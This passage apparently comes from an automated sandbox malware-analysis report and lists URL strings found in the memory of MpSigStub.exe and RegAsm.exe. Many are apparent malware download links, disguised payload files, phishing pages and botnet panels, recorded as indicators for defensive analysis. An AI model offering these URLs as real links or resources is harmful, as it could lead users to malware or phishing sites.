    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpString found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=xl
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://requestbin.net/r/163xiqa1
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://res-backup.com/bin/3.dotm
    Source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmpString found in binary or memory: http://resource.aldtop.com
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://retinnoplay.com//ord/excelz/index.php
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://retirepedia.upsproutmedia.com/obskdhi.php
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://rewards.getjar.com
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: http://rezultsd.info/cd/cd.php?id=%s&ver=ig1
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://rgho.st/download/8ygs8ldbj/3887c2b13922a712c34f8f2407d142bb5b2ed630/3887c2b13922a712c34f8f240
    Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmpString found in binary or memory: http://rghost.net/download/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://rhriss.com.br/site/tmp/swagin
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: http://risweg.com/flpaoql.exe
    Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmpString found in binary or memory: http://rl.ammyy.com
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://rmportal.bpweb.bp.comx
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://rmuxvayun.pkrgzrpdebksbl.gq:23513/eater.htm?little=15162&extent=kiss&switch=19450
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://rocesi.com/mncejd.exe
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://rootedmoon.co.uk/css/syle.css.php
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://royalambassadorschools.com/wp-admin/includes/ftools/johnhood395.php
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://roybeth.com/ext/jquery.php
    Source: RegAsm.exe, 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmpString found in binary or memory: http://rpZocA.com
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: http://rrppdigital.com.ve/wp-content/ai1wm-backups/chrome.jpg
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: http://rs-moto.ru/counter/?a=1
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://ruih.co.uk/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://ruih.co.uk/wapp/doc/
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://s-elisa.ru/data
    Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmpString found in binary or memory: http://s.earching.info/
    Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmpString found in binary or memory: http://s.earching.info/xA
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpString found in binary or memory: http://s.symcd.com0_
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://s.xcodelib.net/updates/ff/apps/111/pubid1001affid100100
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://s.xcodelib.net/updates/ff/apps/116/pubid1004affid100400
    Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmpString found in binary or memory: http://tccinfaes.com
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://te.clickpotato.tv/pte.aspx
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpString found in binary or memory: http://te.platrium.com/pte.aspx
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpString found in binary or memory: http://team.afcorp.afg/chr/crt-ho_30/newjflibrary
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://techwach.com
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://tecmon.hr/
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://teladea.blogspot.com
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://temp.hbsouthmomsclub.com:8080/gnutella.js
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IUserService/GetUsersResponse
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IUserService/GetUsersResponseaX
    Source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IUserService/GetUsersResponsex:
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IUserService/GetUsersT
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/OSoft.Services.Webservice.SystemConfigService/SystemConfigServicexk
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/QuanLyGaraOtoDataSet.xsd
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/SampleProductsDataSet.xsd
    Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/T
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/db_restorentDataSet.xsd
    Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/payrollDataSet1.xsd
    Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/x
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://tendancekart.com/
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://tenillar.com/ko/pos.phpmethod=post
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://tescohomegroseryandelectronicstday2store.duckdns.org/office/
    Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmpString found in binary or memory: http://test.1g.io:3000
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://test.ru/botadmin/index.php
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://thankyou.orderreceipts.square7.ch/applica.exe
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://thecoverstudio.com/modules/jmsslider/views/img/layers/app/updates.doc
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://theenterpriseholdings.com/
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://thehairhive.ca/meg/retwesq.exe
    Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmpString found in binary or memory: http://theonlybookmark.com/in.cgi?11&group=adv001URLGeneral1http://google.com/install.php?time=%dTim
    Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmpString found in binary or memory: http://thescanwinantivirxp.com/index.php?
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://thespecsupportservice.com/uno.dat
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://thevgjhknjkstore.com/
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://thomastongrealestate.com/skywkc/3415201.pnga
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://thomastongrealestate.com/skywkc/dd(oaoabp%
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://thorsolberg.com?
    Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmpString found in binary or memory: http://tibia.pl/earth.php?x=
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://tibiahack.czweb.org/adduser.php?num=
    Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmpString found in binary or memory: http://tikotin.com
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://tiny.cc/Tiktok-Pro
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com/
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com/allinone-downloader
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com/glpdpd4
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com/h7okabu)
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com/hop4az9)
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com/jfrwrhe)
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com/jnvyzcl
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com/jy69pnw)
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com/oc725yj
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://tirb.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpString found in binary or memory: http://tissueling.com
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://titiaredh.com/redirect/
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpString found in binary or memory: http://titulospdf.ddns.net
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://tixwagoq.cn/in.cgi?14
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://tj.kpzip.com
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://tjuegost.info/downloads.html
    Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmpString found in binary or memory: http://tkcode.xyzx
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://tldrnet.top/
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://today-friday.cn/maran/sejvan/get.php
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://toetallynailed.com?
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://tokziraat.com/templates/kallyas/images/favicons/msg.jpg
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://toliku.com/qmzo.exe
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0xM
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://tonisantafe.com/wp-content/themes/lobo/woocommerce/cart/msg.jpg
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://tool.tesvz.com/images/nxz375.jpg
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://tool.world2.cn/toolbar/
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://toolbar.deepdo.com/download/
    Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmpString found in binary or memory: http://toolbarpartner.com
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: http://topguide.co.kr/update/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://topiclab.com/wp-includes/css/index.php)
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://torscreen.org
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://track.wwwapps-ups.com/stats/xstats.php
    Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmpString found in binary or memory: http://tracker.civas.co/UserTracker_deploy/requesthandler.aspx
    Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmpString found in binary or memory: http://trackhits.cc/cnt
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://traderspusers.hol.es/
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/625986.png
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/D
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: http://traff.step57.info/
    Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmpString found in binary or memory: http://trail.filespm.com/dealdo/install-report
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://transfer.sh/
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: http://traveling-blog2017.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://trex-miner.com
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://try-anything-else.com/
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://tsrv1.ws
    Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmpString found in binary or memory: http://tsrv4.ws/
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: http://tu5amrmm.systotal.com/vnmsq40nj1q7a.php?30/receivetimeout30/connecttimeout/silent
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://tukangecuprus.com/cr_file_inst.exe
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://tulip45.sepia.adulteroero.com/set_inf.php?id=ero257.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://tumicy.com/plqijcndwoisdhsaow/
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpString found in binary or memory: http://turbogalaxy.org/ru/?q
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://turtleone.zapto.org/out.rtf
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://twister.agropecuaria.ws/agro/twister.zip
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://twitck.com
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://twogreekgirls.com/wp-content/wellsfargo-online-update/com.htm)
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://u.to/
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://u.to/PbrTEg
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: http://u.to/ardgdq)
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://u.to/sqivdw)
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://ubercancellationfeelawsuit.com/p.png
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://ucil-bd.com/swfobject/alape/index.php)
    Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmpString found in binary or memory: http://uidacrtsppxece.com/ioir.png
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpString found in binary or memory: http://uiltime.info/?c=v3
    Source: MpSigStub.exe, 00000023.00000003.6343112775.0000028BD6735000.00000004.00000001.sdmpString found in binary or memory: http://ulink7.dudu.com/
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpString found in binary or memory: http://ulog.cleaner2009pro.com/?action=
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://ultimatepropertiesllc.com/ike.exe
    Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmpString found in binary or memory: http://uncpbisdegree.com/download3.php?q=
    Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmpString found in binary or memory: http://uncpbisdegree.com/download4.php?q=
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://uniblue.com
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: http://unifscon.com/RemAp.exe
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: http://uninstall.justplug.it
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://uninstall.justplug.it//?ext=824&pid=946
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: http://uninstall.justplug.it/?pid=21&ext=bcool
    Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmpString found in binary or memory: http://uninstall.mysafesavings.com
    Source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmpString found in binary or memory: http://union.hao3603.com/api/down
    Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmpString found in binary or memory: http://unstat.baidu.com
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://unstiff.pw
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: http://up.dev-point.com/uploads/
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://upd.lop.com/upd/check
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://upd.zone-media.com/upd/check
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: http://update.7h4uk.com:443/antivirus.php
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://update.cnnewmusic.com/get_gif.php?
    Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmpString found in binary or memory: http://update.qyule.com/setup.exe
    Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmpString found in binary or memory: http://update.sykehuspartner.no/splunk/
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: http://update.utorrent.com/uninstall?type=%s-%U&h=%s&v=%d
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://update.windowssettings.org/patchwmp/__asf_script_command_ends_here__
    Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://update.xiaoshoupeixun.com/tsbho.ini
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://updates-spreadwork.pw
    Source: MpSigStub.exe, 00000023.00000003.6335125176.0000028BD6F68000.00000004.00000001.sdmpString found in binary or memory: http://updates.winsoftware.com/
    Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmpString found in binary or memory: http://upgrade.onestepsearch.net
    Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmpString found in binary or memory: http://upload.exe
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://uploader.sx/uploads/2018/5b9ed5bc.exe
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://uprevoy.com/
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: http://urels.ml/sokha2.php
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: http://url.cn/
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://url.fzpmh.com/
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: http://urlz.fr/6zdb
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://ursreklam.com/wp-content/themes/sketch/vall1/agh.doc
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: http://us.onesoftperday.com
    Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmpString found in binary or memory: http://usa-national.info/gpu/band/grumble.dot
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://usb.mine.nu/p.php
    Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmpString found in binary or memory: http://usd.881515.net/down/1.exe
    Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmpString found in binary or memory: http://user.qzone.qq.com/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://users.cpadown.com/ktv/
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://ushuistov.net/cgi-bin/check/autoaff
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: http://utclient.utorrent.com/pro/bittorrent/
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: http://utclient.utorrent.com/pro/flow/trial/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://uwibami.com/indexx.php)
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://uxos.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s
